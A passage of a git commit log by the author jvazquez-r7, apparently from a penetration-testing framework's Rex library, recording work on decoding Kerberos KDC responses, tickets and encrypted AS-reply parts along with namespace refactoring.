2014-12-15 11:47:08 -06:00
jvazquez-r7
643279b54b
Add support to decode the encryption part of as responses
2014-12-15 11:46:11 -06:00
jvazquez-r7
d81cdd6cbb
Add KdcResponse spec first draft
2014-12-14 21:20:54 -06:00
jvazquez-r7
c3a2bcf956
Make KdcResponse decoding better
2014-12-14 21:01:09 -06:00
jvazquez-r7
442adb080f
Add first support to decode tickets
2014-12-14 20:51:26 -06:00
jvazquez-r7
35742873c7
Delete references to deleted namespaces
2014-12-14 19:23:21 -06:00
jvazquez-r7
78c76092dd
Delete namespaces from model classes
2014-12-14 19:18:30 -06:00
jvazquez-r7
13ae624738
Delete namespaces
2014-12-14 19:15:57 -06:00
jvazquez-r7
2d0cb5acd8
Move elements to model dir
2014-12-14 19:11:21 -06:00
jvazquez-r7
328e9f62e8
Add first draft for Kerberos responses
2014-12-14 19:09:41 -06:00
jvazquez-r7
483c273e17
Add support to decode responses on the Rex client
2014-12-14 17:54:17 -06:00
jvazquez-r7
883bfd1f46
Add support to retrieve e-data
2014-12-14 17:23:37 -06:00